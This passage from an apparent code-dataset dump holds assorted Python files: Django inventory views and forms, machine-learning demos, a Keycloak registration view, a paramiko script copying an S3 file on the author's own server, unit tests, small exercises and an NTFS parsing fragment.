duplicate_in_p_name_code(request): # find and delete duplicate item name and code from database.\n dupes = ProductCodeName.objects.values('name').annotate(Count('id')).order_by().filter(id__count__gt=1)\n records = ProductCodeName.objects.filter(name__in=[item['name'] for item in dupes])\n print(records)\n records.delete()\n context = {\n # 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\n# Product Name and code store from demo_code_and_name\ndef product_name_store(request):\n code_name_dict = DemoNameCode.objects.all()\n for code_name in code_name_dict:\n form2 = ProductCodeName()\n print(\"--------------------------\")\n form2.code = code_name.p_code\n print(\"Code\", code_name.p_code)\n form2.name = code_name.p_name\n print(\"Name\", code_name.p_name)\n form2.item_unit = code_name.p_unit\n print(\"Unit\", code_name.p_unit)\n form2.item_under_group = code_name.item_under_group\n print(\"Group\", code_name.item_under_group)\n form2.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef item_group_name_change(request):\n name = \"Timber & Stationary\"\n group_name = ProductCodeName.objects.filter(Q(item_under_group=name))\n for group in group_name:\n print(\"--------------------------\")\n group.item_under_group = \"Timber and Stationary\"\n group.save()\n print(\"Group\", group.item_under_group)\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef data_entry_statement(request):\n total_buy = 0\n total_issue = 0\n purchase_info = ''\n issue_info = ''\n if request.method == 'POST':\n start_date = request.POST.get('start_date')\n end_date = request.POST.get('end_date')\n issuer_name = request.POST.get('issuer_name') # receive product code from post method.\n if issuer_name:\n purchase_info = ProductStore.objects.filter(Q(recorder=issuer_name) & \n Q(buy_onDate__range=[start_date, end_date]))\n \n if purchase_info:\n for item_buy in purchase_info:\n total_buy = total_buy + float(item_buy.item_quantity)\n print(total_buy)\n if issuer_name:\n issue_info = ProductIssue.objects.filter(Q(issuer_name=issuer_name) &\n Q(date__range=[start_date, end_date]))\n if issue_info:\n for item_issue in issue_info:\n total_issue = total_issue + float(item_issue.item_quantity)\n print(issue_info)\n print(total_issue)\n context = {\n 'purchase_info': purchase_info,\n 'issue_info': issue_info,\n 'total_issue': total_issue,\n 'total_buy': total_buy,\n 'start_date': start_date,\n 'end_date': end_date,\n }\n return render(request, 'main_store/data_entry_statement.html', context)\n\n context = {\n\n }\n return render(request, 'main_store/data_entry_statement.html', context)\n\n\ndef indent_form(request):\n submitted = False\n if request.method == 'POST':\n if '_save' in request.POST:\n indent_no = request.POST.get('indent_no')\n form = IndentForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Data Save Indent Form\")\n else:\n print('Form not valid!')\n context = {\n 'submitted': submitted\n }\n return render(request, \"main_store/indent_form.html\", context)\n\n\ndef indent_box(request):\n indent_list = Indent.objects.all()\n context = {\n 'indent_list': indent_list\n }\n return render(request, \"main_store/mailbox_indent.html\", context)","sub_path":"main_store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":34973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"199707950","text":"import numpy as np\nfrom 
sklearn.metrics import accuracy_score\n\nfrom bayesian_decision_tree.classification import PerpendicularClassificationTree\nfrom examples import helper\n\n# demo script for classification (binary or multiclass) using classic, axis-normal splits\nif __name__ == '__main__':\n # proxies (in case you're running this behind a firewall)\n args = helper.parse_args()\n proxies = {\n 'http': args.http_proxy,\n 'https': args.https_proxy\n }\n\n # data set: uncomment one of the following sections\n\n # artificial 4-class data somewhat similar to the Ripley data\n # n_train = 500\n # n_test = 2000\n # x0 = [1, 3, 2, 4]\n # x1 = [1, 1, 3, 3]\n # sd = 0.7\n # X_train = np.zeros((n_train, 2))\n # y_train = np.zeros((n_train, 1))\n # X_test = np.zeros((n_test, 2))\n # y_test = np.zeros((n_test, 1))\n # np.random.seed(666)\n # for i in range(4):\n # X_train[i * n_train//4:(i + 1) * n_train//4, 0] = np.random.normal(x0[i], sd, n_train//4)\n # X_train[i * n_train//4:(i + 1) * n_train//4, 1] = np.random.normal(x1[i], sd, n_train//4)\n # y_train[i * n_train//4:(i + 1) * n_train//4] = i\n #\n # X_test[i * n_test//4:(i + 1) * n_test//4, 0] = np.random.normal(x0[i], sd, n_test//4)\n # X_test[i * n_test//4:(i + 1) * n_test//4, 1] = np.random.normal(x1[i], sd, n_test//4)\n # y_test[i * n_test//4:(i + 1) * n_test//4] = i\n # train = np.hstack((X_train, y_train))\n # test = np.hstack((X_test, y_test))\n\n # np.random.seed(5)\n #\n # n = 10000\n # X_train = np.random.uniform(0, 4, (n, 2))\n # y_train = np.zeros((n, 1))\n # y_train[(X_train[:, 0] >= 1) & (X_train[:, 0] < 2) & (X_train[:, 1] <= 3)] = 1\n # y_train[(X_train[:, 0] >= 2) & (X_train[:, 0] < 3) & (X_train[:, 1] <= 1)] = 1\n # y_train[(X_train[:, 0] >= 3)] = 1\n #\n # angle = 30*np.pi/180\n # X_train_rot = X_train.copy()\n # X_train_rot[:, 0] = np.cos(angle)*X_train[:, 0] + np.sin(angle)*X_train[:, 1]\n # X_train_rot[:, 1] = -np.sin(angle)*X_train[:, 0] + np.cos(angle)*X_train[:, 1]\n # X_train = X_train_rot\n #\n # train = np.hstack((X_train, y_train))\n # test = train\n\n # or, alternatively, load a UCI dataset\n train, test = helper.load_ripley(proxies)\n\n n_dim = len(np.unique(train[:, -1]))\n\n if train is test:\n # perform a 50:50 train:test split if no test data is given\n train = train[0::2]\n test = test[1::2]\n\n X_train = train[:, :-1]\n y_train = train[:, -1]\n X_test = test[:, :-1]\n y_test = test[:, -1]\n\n # prior\n prior_pseudo_observations = 1\n prior = prior_pseudo_observations * np.ones(n_dim)\n\n # model\n model = PerpendicularClassificationTree(\n partition_prior=0.9,\n prior=prior,\n delta=0,\n prune=True)\n\n # train\n model.fit(X_train, y_train)\n print(model)\n print()\n print('Tree depth and number of leaves: {}, {}'.format(model.get_depth(), model.get_n_leaves()))\n print('Feature importance:', model.feature_importance())\n\n # compute accuracy\n y_pred_train = model.predict(X_train)\n y_pred_test = model.predict(X_test)\n accuracy_train = accuracy_score(y_train, y_pred_train)\n accuracy_test = accuracy_score(y_test, y_pred_test)\n info_train = 'Train accuracy: {:.4f} %'.format(100 * accuracy_train)\n info_test = 'Test accuracy: {:.4f} %'.format(100 * accuracy_test)\n print(info_train)\n print(info_test)\n\n from sklearn.metrics import roc_curve\n print(roc_curve(y_train, model.predict_proba(X_train)[:, 1]))\n\n # plot if 1D or 2D\n dimensions = X_train.shape[1]\n if dimensions == 1:\n helper.plot_1d_perpendicular(model, X_train, y_train, info_train, X_test, y_test, info_test)\n elif dimensions == 2:\n 
helper.plot_2d_perpendicular(model, X_train, y_train, info_train, X_test, y_test, info_test)\n","sub_path":"Package/bayesian_tree/examples/demo_classification_perpendicular.py","file_name":"demo_classification_perpendicular.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"372408279","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom networks.models import AttnLinear, ImageEncoder, NPDecoder\nfrom networks.performer_pytorch import FastAttention\nfrom utils import save_config\n\n\nclass ANPDistractor(nn.Module):\n \"\"\"\n ANP for Distractor\n \"\"\"\n def __init__(self, config):\n super(ANPDistractor, self).__init__()\n self.device = config.device\n self.img_size = config.img_size\n self.img_channels = self.img_size[2] - 1 if config.task == \"shapenet_3d\" else self.img_size[2]\n self.task_num = config.tasks_per_batch\n self.label_dim = config.input_dim\n self.agg_mode = config.agg_mode\n self.img_agg = config.img_agg\n self.y_dim = config.output_dim\n self.dim_w = config.dim_w\n self.save_latent_z = config.save_latent_z\n seed = config.seed\n torch.manual_seed(seed) # make network initialization fixed\n\n self.img_encoder = ImageEncoder(aggregate=self.img_agg, task_num=self.task_num, img_channels=self.img_channels)\n\n self.transform_y = nn.Linear(self.label_dim, self.dim_w)\n\n self.task_encoder = nn.Sequential(\n nn.Linear(256 + self.dim_w, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n )\n self.mu = nn.Linear(256, 256)\n self.decoder = NPDecoder(aggregate=self.img_agg, output_dim=self.y_dim, task_num=self.task_num, img_channels=self.img_channels, img_size=self.img_size)\n\n # attention block\n h_dim = 256\n n_heads = 8\n self._W_k = nn.ModuleList(\n [AttnLinear(h_dim, h_dim) for _ in range(n_heads)]\n )\n self._W_v = nn.ModuleList(\n [AttnLinear(h_dim, h_dim) for _ in range(n_heads)]\n )\n self._W_q = nn.ModuleList(\n [AttnLinear(h_dim, h_dim) for _ in range(n_heads)]\n )\n self._W = AttnLinear(n_heads * h_dim, h_dim)\n self.attn = FastAttention(dim_heads=256,\n # nb_features=nb_features,\n causal=False)\n self._attention_func = self._multihead_attention\n self.n_heads = n_heads\n\n def _multihead_attention(self, k, v, q):\n k_all = []\n v_all = []\n q_all = []\n\n for i in range(self.n_heads):\n k_ = self._W_k[i](k)\n v_ = self._W_v[i](v)\n q_ = self._W_q[i](q)\n\n k_all.append(k_)\n v_all.append(v_)\n q_all.append(q_)\n\n #out = self._dot_attention(k_, v_, q_)\n #outs.append(out)\n k_all = torch.stack(k_all, dim=1)\n v_all = torch.stack(v_all, dim=1)\n q_all = torch.stack(q_all, dim=1)\n outs = self.attn(q=q_all, k=k_all, v=v_all)\n outs = outs.permute(0,2,3,1).contiguous()\n outs = outs.view(outs.shape[0], outs.shape[1], -1)\n rep = self._W(outs)\n return rep\n\n def forward(self, batch_train_images, label_train, batch_test_images, test=False):\n \"\"\"\n\n :param img_context: context images\n :param img_target: target image\n :param y_target: target label (bar length)\n :return:\n \"\"\"\n\n self.test_num = batch_test_images.shape[1]\n self.ctx_num = batch_train_images.shape[1]\n if self.ctx_num:\n label_train = self.transform_y(label_train)\n batch_train_images = batch_train_images.reshape(-1, self.img_channels, self.img_size[0], self.img_size[1])\n batch_test_images = batch_test_images.reshape(-1, self.img_channels, self.img_size[0], self.img_size[1])\n x_ctx = self.img_encoder(batch_train_images)\n 
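# The same image encoder embeds the context and target sets; in the attention\n# call below, the context embeddings act as keys, the encoded (context, label)\n# features as values, and the target embeddings as queries.\n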
x_tgt = self.img_encoder(batch_test_images)\n\n x = torch.cat([x_ctx, label_train], dim=2)\n context_features = self.task_encoder(x)\n\n # attention\n context_features = self._attention_func(x_ctx, context_features, x_tgt)\n mu = self.mu(context_features)\n sample_features = mu\n else:\n sample_features = torch.ones(self.task_num, self.test_num, 256).to(self.device) * 0.0\n # log_variance = torch.ones(self.task_num, self.test_num, 256).to(self.device) * 1.0\n\n generated_angles, generated_var = self.decoder(batch_test_images, sample_features)\n\n kl = 0\n\n if self.save_latent_z:\n return generated_angles, generated_var, sample_features, kl\n elif not self.save_latent_z:\n return generated_angles, generated_var, kl\n\n def sample(self, mu, log_variance, test=False):\n if test:\n snum = self.test_num_samples\n else:\n snum = self.num_samples\n return self.sample_normal(mu, log_variance, snum, test)\n\n def sample_normal(self, mu, log_variance, num_samples, test):\n \"\"\"\n Generate samples from a parameterized normal distribution.\n :param mu: tf tensor - mean parameter of the distribution.\n :param log_variance: tf tensor - log variance of the distribution.\n :param num_samples: np scalar - number of samples to generate.\n :return: tf tensor - samples from distribution of size num_samples x dim(mu).\n \"\"\"\n eps = torch.randn(self.task_num, num_samples, mu.size(1)).to(self.device)\n variance = 1e-5 + F.softplus(log_variance)\n variance = variance.repeat(1, num_samples, 1)\n mu = mu.repeat(1, num_samples, 1)\n if test:\n return mu\n else:\n return mu + eps * torch.sqrt(variance)\n\n def visualize(self):\n latent_data = self.latent_data.cpu()\n self.TSNE.transform(latent_data[:, :-3], latent_data[:, -3:])\n self.TSNE.vis()\n\n def weight_init(self, m):\n if isinstance(m, nn.Conv2d):\n if self.init_type == 'normal':\n nn.init.kaiming_normal_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n # if m.bias is not None:\n # fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n # bound = 1 / math.sqrt(fan_in)\n # init.uniform_(self.bias, -bound, bound)\n elif self.init_type == 'uniform':\n m.weight.data.uniform_(-1.0, 1.0)\n\n # nn.init.kaiming_uniform_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n\n if isinstance(m, nn.Linear):\n if self.init_type == 'normal':\n nn.init.kaiming_normal_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n # if m.bias is not None:\n # fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n # bound = 1 / math.sqrt(fan_in)\n # init.uniform_(self.bias, -bound, bound)\n elif self.init_type == 'uniform':\n m.weight.data.uniform_(-1.0, 1.0)\n\n # nn.init.kaiming_uniform_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n","sub_path":"networks/ANPDistractor.py","file_name":"ANPDistractor.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"528845691","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Open Software License (\"OSL\") v. 
3.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.opensource.org/licenses/osl-3.0.php\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport sys\nimport os\nsys.path.insert(0,os.path.abspath(__file__+\"/../../\"))\nfrom pyccuracy.errors import TestFailedError\nfrom pyccuracy.pyccuracy_core import *\n\nclass TestWaitForElementError(unittest.TestCase):\n\n def setUp(self):\n self.pyccuracy = PyccuracyCore()\n\n def test_invalid_path_is_used(self):\n result = self.pyccuracy.run_tests(file_pattern=\"test_wait_for_element_error.acc\",\n should_throw=False,\n report_file_name=\"invalidurlreport.html\")\n\n assert result.status == 'FAILED'\n assert result.failed_scenarios == 1\n error_message = str(result.stories[0].scenarios[0].whens[0].error)\n expected_message = u\"The action wait for page to load timed out after waiting for 10000 ms.\"\n assert error_message == expected_message, \"Expected different than actual:\\n\\nExpected:'%s'\\nActual: '%s'\" % (expected_message, error_message)\n\n def test_invalid_path_is_used_in_pt_br(self):\n result = self.pyccuracy.run_tests(file_pattern=\"test_wait_for_element_error_pt-br.acc\",\n should_throw=False,\n default_culture=\"pt-br\",\n report_file_name=\"invalidurlreport.html\")\n\n assert result.status == 'FAILED'\n assert result.failed_scenarios == 1\n error_message = str(result.stories[0].scenarios[0].whens[0].error)\n expected_message = u\"A ação de esperar a página carregar não foi executada com sucesso após um timeout de 10000 milisegundos.\"\n assert error_message == expected_message, \"Expected different than actual:\\n\\nExpected:'%s'\\nActual: '%s'\" % (expected_message, error_message)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_wait_for_element_error.py","file_name":"test_wait_for_element_error.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"318031702","text":"# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\n\nimport jinja2\nimport six\n\n\ndef render_values(mapping=None, context=None):\n \"\"\"\n Render an incoming mapping using context provided in context using Jinja2. 
Returns a dict\n containing rendered mapping.\n\n :param mapping: Input as a dictionary of key value pairs.\n :type mapping: ``dict``\n\n :param context: Context to be used for dictionary.\n :type context: ``dict``\n\n :rtype: ``dict``\n \"\"\"\n\n if not context or not mapping:\n return mapping\n\n env = jinja2.Environment(undefined=jinja2.StrictUndefined)\n rendered_mapping = {}\n for k, v in six.iteritems(mapping):\n # jinja2 works with string so transform list and dict to strings.\n reverse_json_dumps = False\n if isinstance(v, dict) or isinstance(v, list):\n v = json.dumps(v)\n reverse_json_dumps = True\n else:\n v = str(v)\n rendered_v = env.from_string(v).render(context)\n # no change therefore no templatization so pick params from original to retain\n # original type\n if rendered_v == v:\n rendered_mapping[k] = mapping[k]\n continue\n if reverse_json_dumps:\n rendered_v = json.loads(rendered_v)\n rendered_mapping[k] = rendered_v\n return rendered_mapping\n","sub_path":"st2common/st2common/util/jinja.py","file_name":"jinja.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"347829696","text":"\nimport paramiko\n\nkey = paramiko.RSAKey.from_private_key_file('/home/bridgeit/Downloads/vinitkeypair.pem')\nclient = paramiko.SSHClient()\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n# Connect/ssh to an instance\ntry:\n # Here 'ubuntu' is user name and 'instance_ip' is public IP of EC2\n client.connect(hostname='13.127.37.241', username=\"ubuntu\", pkey=key)\n\n # Execute a command(cmd) after connecting/ssh to an instance\n #stdin, stdout, stderr = client.exec_command('ls ./folder1')\n stdin, stdout, stderr = client.exec_command('aws s3 cp s3://vinn/h.html /home/ubuntu/folder1/h1.html')\n print(stdout.read())\n\n # close the client connection once the job is done\n client.close()\n\n\nexcept BaseException as e:\n print(e)","sub_path":"PythAws/rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"220323595","text":"from django import forms\r\nfrom .models import Profile,User\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom crispy_forms.helper import FormHelper\r\nfrom PIL import Image\r\nfrom django.core.files import File\r\n\r\nclass SignUpForm(UserCreationForm):\r\n Choice= ((None,'Select gender'),('M','Male'), ('F','Female'),('O','Other'), )\r\n first_name = forms.CharField(max_length=30, required=False)\r\n last_name = forms.CharField(max_length=30, required=False)\r\n email = forms.EmailField(max_length=254)\r\n birth_date = forms.DateField()\r\n gender = forms.ChoiceField(choices=Choice)\r\n country = forms.CharField(max_length='100')\r\n\r\n class Meta:\r\n model = User\r\n fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2','gender','country' )\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(SignUpForm, self).__init__(*args, **kwargs)\r\n self.helper = FormHelper(self)\r\n\r\nclass ProfileForm(forms.ModelForm):\r\n class Meta:\r\n model = Profile\r\n fields = ('image','country', 'city','state','fullAddress')\r\n\r\n\r\n\r\n\r\nclass PhotoForm(forms.ModelForm):\r\n x = forms.FloatField(widget=forms.HiddenInput())\r\n y = forms.FloatField(widget=forms.HiddenInput())\r\n width = forms.FloatField(widget=forms.HiddenInput())\r\n height = forms.FloatField(widget=forms.HiddenInput())\r\n\r\n class 
Meta:\r\n model = Profile\r\n fields = ('image', 'x', 'y', 'width', 'height', )\r\n\r\n def save(self):\r\n profile = super(PhotoForm, self).save()\r\n\r\n x = self.cleaned_data.get('x')\r\n y = self.cleaned_data.get('y')\r\n w = self.cleaned_data.get('width')\r\n h = self.cleaned_data.get('height')\r\n\r\n image = Image.open(profile.image)\r\n cropped_image = image.crop((x, y, w+x, h+y))\r\n resized_image = cropped_image.resize((200, 200), Image.ANTIALIAS)\r\n resized_image.save(profile.image.path)\r\n\r\n return profile","sub_path":"social/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"310165790","text":"\"\"\"\nAuthor: Jim Culbert\nCopyright (c) 2021 MGHPCC\nAll rights reserved. No warranty, explicit or implicit, provided.\n\"\"\"\n\nimport requests\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom .utils import get_user_confirmation\nfrom ..models import AccountAction\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef validate(request):\n regcode = request.GET.get('regcode', None)\n\n data = {}\n if regcode is None:\n logmsg = \"No regcode supplied. Cannot complete registration.\"\n logger.warning(logmsg)\n data[\"error\"] = logmsg\n else:\n try:\n pending_account_action = AccountAction.objects.get(\n regcode=regcode\n )\n except AccountAction.DoesNotExist:\n logmsg = f\"Unrecognized registration code {regcode}\"\n logger.warning(logmsg)\n data[\"error\"] = logmsg\n pending_account_action = None\n\n if pending_account_action is not None:\n opcode = pending_account_action.opcode\n\n api_endpoint = (\n f\"{settings.MSS_KC_SERVER}/auth/admin/realms/\"\n f\"{settings.MSS_KC_REALM}/users\"\n )\n\n headers = {\n 'Authorization': f\"Bearer {request.client_token}\",\n 'Content-Type': 'application/json'\n }\n\n data[\"firstName\"] = pending_account_action.firstName\n data[\"lastName\"] = pending_account_action.lastName\n data[\"email\"] = pending_account_action.email\n data[\"username\"] = pending_account_action.username\n data[\"emailVerified\"] = True\n data[\"enabled\"] = True\n\n # UPDATE (EMAIL CHANGED)\n # Update email was accepted\n # convert to a normal pending update\n # and validate with user at new address\n if opcode == 'update_verify_new_email':\n logger.debug(\n f\"User {pending_account_action.username} accepted email \"\n f\"change to {pending_account_action.email}. 
Proceding to \"\n \"verify new address.\"\n )\n http_verb = None\n pending_account_action.opcode = 'update'\n pending_account_action.save()\n\n get_user_confirmation(\n pending_account_action,\n pending_account_action.email\n )\n\n # UPDATE (NO EMAIL CHANGE)\n elif opcode == 'update':\n http_verb = 'PUT'\n if pending_account_action.sub != \"\":\n api_endpoint = (\n f\"{api_endpoint}/{pending_account_action.sub}\"\n )\n else:\n logmsg = \"Update action must specify a subject\"\n logger.error(logmsg)\n raise RuntimeError(logmsg)\n\n # CREATE\n else:\n http_verb = 'POST'\n idp_link = {\n 'identityProvider': 'cilogon',\n 'userId': pending_account_action.linked_sub,\n 'userName': pending_account_action.username\n }\n data['federatedIdentities'] = [idp_link]\n data['attributes'] = {\n 'cilogon_idp_name': pending_account_action.linked_idp_name\n }\n\n # MAKE CHAGES IF CREATE OR UPDATE (NO EMAIL CHANGE)\n # Email change cause additional validation email...\n if http_verb is not None:\n try:\n r = requests.request(\n http_verb,\n api_endpoint,\n json=data,\n headers=headers\n )\n\n if r.ok:\n logger.info(\n f\"Acocunt {opcode} completed successfully for \"\n f\"subject {pending_account_action.sub}.\"\n )\n pending_account_action.delete()\n\n else:\n server_error = r.json()['errorMessage']\n logger.error(\n f\"Error in account {opcode} for sub \"\n f\"{pending_account_action.sub}. server returned \"\n f\"{server_error}.\"\n )\n data['error'] = server_error\n\n except requests.exceptions.RequestException as re:\n logmsg = (\n f\"Error with account {opcode} for \"\n f\"{pending_account_action.sub} A problem occurred \"\n f\"communicating with the server. {re}\"\n )\n logger.debug(logmsg)\n data['error'] = logmsg\n\n except requests.exceptions.JSONDecodeError as decode_error:\n logger.debug(\n f\"Error decoding server response. 
{decode_error}\"\n )\n data['error'] = \"Unknown error.\"\n\n except Exception:\n logger.error(\n f\"An unknown error occurred while performing \"\n f\"account {opcode} for sub \"\n f\"{pending_account_action.sub}\"\n )\n data['error'] = \"Unknown error.\"\n\n # Have to set after sending request because server\n # does not recognize option \"opcode\"\n data['opcode'] = opcode\n\n return render(\n request,\n template_name='regapp/validate.j2',\n context={'account_action': data}\n )\n","sub_path":"apps/regapp/views/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"114254140","text":"from requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\n\nEXAMPLE_EVENTS = [{\n 'summary': 'Test',\n 'description': 'Good food wow',\n \"location\": 'Danciger B', # free form\n 'start': {'dateTime': '2018-05-06T13:00:00',\n 'timeZone': 'Asia/Jerusalem'},\n 'end': {'dateTime': '2018-05-06T16:00:00',\n 'timeZone': 'Asia/Jerusalem'},\n}]\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n print('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns true if the response seems to be HTML, false otherwise\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef to_google_format(date_time):\n \"\"\"\n Formats a given datetime to the format required by google calendar.\n \"\"\"\n try:\n return date_time.strftime('%Y-%m-%dT%H:%M:%S')\n except BaseException:\n return ''\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"47234358","text":"import math\nimport unittest\n\ndef wallis(i):\n piestim=1\n for j in range(1,i+1):\n t=((4*j*j)/((4*j*j)-1))\n piestim=piestim*t\n return (2*piestim)\n\nfrom random import *\ndef monte_carlo(i):\n nodescircle=0\n nodessquare=0\n for j in range(i):\n x=random()\n y=random()\n if(x*x+y*y)<=1:\n nodescircle+=1\n nodessquare+=1\n else :\n nodessquare+=1\n return (4*nodescircle/nodessquare)\nclass TestWallis(unittest.TestCase):\n def test_low_iters(self):\n for i in range(0, 5):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) > 0.15, msg=f\"Estimate with just {i} iterations is {pi} which is too accurate.\\n\")\n \n def test_high_iters(self):\n for i in range(500, 600):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) < 0.01, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n\n\nclass TestMC(unittest.TestCase):\n def test_randomness(self):\n pi0 = monte_carlo(15000)\n pi1 = monte_carlo(15000)\n \n self.assertNotEqual(pi0, pi1, \"Two different estimates for PI are exactly the same. This is almost impossible.\")\n\n self.assertFalse(abs(pi0 - pi1) > 0.05, \"Two different estimates of PI are too different. 
This should not happen\")\n\n def test_accuracy(self):\n for i in range(500, 600):\n pi = monte_carlo(i)\n self.assertTrue(abs(pi - math.pi) < 0.4, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n \n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"estimate.py","file_name":"estimate.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"153603714","text":"def sum_n(n):\n if n == 0:\n return 0\n return n+sum_n(n-1)\n\nprint(sum_n(3))\n\n\nprint(\"Довгаль Ірина\\n КМ-83\\nvariant 4\")\nprint(\" Function - Parse(s,t). \"\n \"Purpose - splits the string s into two parts: before the first occurrence of the character t, and after it. \\n\\n\")\na = input(\"enter a string\")\nb = input(\"enter a letter\")\ndef Parse(s, t):\n print(s[0:s.find(t)])\n print(s[s.find(t):])\n return \"finish\"\n\nif b in a:\n Parse(a,b)\nelse:\n print(\"the character is not in the string\")\n\n\n##\n","sub_path":"km-83/Dovgal_Iryna/workshop1/homework/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"60930083","text":"from whelk import *\nimport unittest\nimport sys, os\n\nPY3 = sys.version_info[0] == 3\nif PY3:\n b = lambda x: x.encode('latin-1')\nelse:\n b = lambda x: x\nos.environ['PATH'] = os.pathsep.join([\n os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bin'),\n os.environ['PATH']\n])\n","sub_path":"whelk/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"421483547","text":"#\n# @lc app=leetcode id=55 lang=python3\n#\n# [55] Jump Game\n#\n\n# @lc code=start\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n res = 0\n for i in range(len(nums) - 2, -1, -1):\n if nums[i] > res:\n res = 0\n else:\n res += 1\n return res == 0\n\n# @lc code=end\n","sub_path":"55.jump-game.py","file_name":"55.jump-game.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"424502284","text":"import datetime\nimport struct\n\n\ndef as_signed_le(bs):\n if len(bs) <= 0 or len(bs) > 8:\n raise ValueError()\n\n signed_format = {1: 'b', 2: 'h', 4: 'l', 8: 'q'}\n\n fill = b'\\xFF' if ((bs[-1] & 0x80) >> 7) == 1 else b'\\x00'\n\n while len(bs) not in signed_format:\n bs = bs + fill\n\n return struct.unpack('<' + signed_format[len(bs)], bs)[0]\n\n#bytes per sector\ndef get_sector_size(fs_bytes):\n return as_signed_le(fs_bytes[11:13])\n\n#bytes per cluster\ndef get_cluster_size(fs_bytes):\n return as_signed_le(fs_bytes[13:14]) * get_sector_size(fs_bytes)\n\n#cluster # of first MFT\ndef get_first_mft_cluster(fs_bytes):\n return as_signed_le(fs_bytes[48:56]) #to get decimal offset of first MFT, multiply by get_cluster_size( )\n\n#mft entry size (in bytes)\ndef get_mft_entry_size(fs_bytes):\n size = as_signed_le(fs_bytes[64:65])\n if size < 0:\n return 2 ** abs(size)\n return size * get_cluster_size(fs_bytes)\n\ndef get_first_attribute_offset(mft_bytes):\n return as_signed_le(mft_bytes[20:22])\n\ndef get_attribute_header(mft_bytes, attribute_offset):\n start = 